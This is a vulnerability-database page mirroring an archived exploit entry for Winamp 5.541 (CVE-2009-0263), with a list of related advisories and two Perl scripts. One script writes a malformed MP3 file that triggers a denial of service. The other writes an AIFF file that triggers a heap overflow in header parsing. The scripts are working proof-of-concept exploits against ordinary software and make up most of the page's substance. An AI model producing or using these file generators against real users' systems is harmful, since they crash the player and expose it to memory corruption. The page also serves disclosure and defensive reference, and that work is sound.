Lucene search
+L

Winamp 5.541 - '.mp3'/'.aiff' File Multiple Denial of Service Vulnerabilities

🗓️ 12 Jan 2009 00:00:00Reported by securfrogType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

Winamp 5.541 Multiple Denial of Service Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2009-0263
23 Jan 200919:00
attackerkb
circl
Circl
CVE-2009-0263
12 Jan 200900:00
circl
checkpoint_advisories
Check Point Advisories
Nullsoft Winamp AIFF Parsing Heap Buffer Overflow (CVE-2009-0263)
6 Oct 200900:00
checkpoint_advisories
cve
CVE
CVE-2009-0263
23 Jan 200918:38
cve
cvelist
Cvelist
CVE-2009-0263
23 Jan 200918:38
cvelist
euvd
EUVD
EUVD-2009-0268
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0263
23 Jan 200919:00
nvd
openvas
OpenVAS
Winamp AIFF File Multiple Buffer Overflow Vulnerabilities
29 Jan 200900:00
openvas
openvas
OpenVAS
Winamp AIFF File Multiple Buffer Overflow Vulnerabilities
29 Jan 200900:00
openvas
prion
Prion
Buffer overflow
23 Jan 200919:00
prion
Rows per page
################################################################################################################################
#Winamp <= 5.541 multiples Denial of Services (MP3/AIFF)
#
# Winamp MP3 file parsing DoS ==>
#!/usr/bin/perl
use strict;
my $mp3 =
"\x49\x44\x33\x00\x00\x00\x00\x00\x09\x07\x54\x49\x54\x32\x00\x00\x00\x08\x00\x00\x00".
"\x50\x69\x73\x74\x65\x20\x35\x54\x50\x45\x31\x00\x00\x00\x05\x00\x00\x00\x41\x6e".
"\x69\x73\x54\x41\x4c\x42\x00\x00\x00\x0d\x00\x00\x00\x62\x6c\x61\x62\x6c\x61\x20".
"\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
my $mp32 =
"\x20" x 1500;

open(out, "> test.mp3");
binmode(out);
print (out $mp3, $mp32);
close(out);

#### Winamp AIFF file parsing header heap overflow :
#!/usr/bin/perl
use strict;
my $aiff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4".
"\x00";
open(out, "> test.aiff");
binmode(out);
print (out $aiff);
close(out);

# milw0rm.com [2009-01-12]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.16738
29